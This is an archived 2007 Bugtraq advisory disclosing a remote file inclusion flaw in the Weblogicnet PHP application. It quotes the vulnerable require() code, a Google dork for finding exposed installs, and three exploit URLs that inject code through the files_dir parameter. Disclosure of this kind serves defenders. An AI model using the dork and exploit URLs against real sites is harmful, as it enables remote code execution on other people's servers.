lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070831235119.22212.qmail@securityfocus.com>
Date: 31 Aug 2007 23:51:19 -0000
From: home_edition2001@....mildnet.org
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #15 (home_edition2001) - Weblogicnet
 (files_dir) Remote File Inclusion

#############################Nyubicrew Community################################
#
#  Weblogicnet (files_dir) Remote File Inclusion
#
#  vendor : http://www.weblogicnet.com/
#  source : http://weblogicnet.com/data/weblogicnet.tgz 
#
#################################################################################
#
#
#       Bug Found By :home_edition2001 a.k.a (bius) (31-08-2007)
#
#       contact: bius22@....com
#
#       Website : www.solpotcrew.org/adv/home_edition2001-adv-02.txt
#
################################################################################
#
#
#      Greetz: Nyubi aka solpot , Matdhule , S4M3K ,[DEVIL_MAY_CRY] , iFX , Scr3W_W0rM , 
#              nakkuta , bukan-diriku , POET , Th0nk , mbako_semprul , Fungky , airsoul
#              wong_edan , ^s0n_g0ku^ , aLiiF , sparta-x , dudut , xtremeshell , Bithedz
#              th3sn0wbr4in , ReAksi , X8 , junkiest , K1tk4t , masboi , saritem
#              x-ace , replacement_killer , LamerCrew , k1n9k0ng ,[K]ompoR_Meledu[K]
#              and all member #nyubicrew @ irc.mildnet.org
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "files_dir" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from :
es_desp.php
es_custom_menu.php
es_offer.php

################################################################################
# Weblogicnet                                                                  #
# http://www.weblogicnet.com/                info@...logicnet.com              #
################################################################################
# Use of this program constitutes your agreement to the terms contained in the #
# LICENSE file within this distribution.                                       #
################################################################################

<ahref="
<?php require($files_dir.'/_custom_menu_link.php'); ?>">
<?php require($files_dir.'/_custom_menu_name.php'); ?></a><br>

google dork : inurl:es_offer.php?files_dir=

exploit : http://somehost/path_to_Weblogicnet/es_desp.php?files_dir=[evilCode]
          http://somehost/path_to_Weblogicnet/es_custom_menu.php?files_dir=[evilCode]
          http://somehost/path_to_Weblogicnet/es_offer.php?files_dir=[evilCode]

######################MY Special Girl JUST FOR U Ula#########################
######################################E.O.F##################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ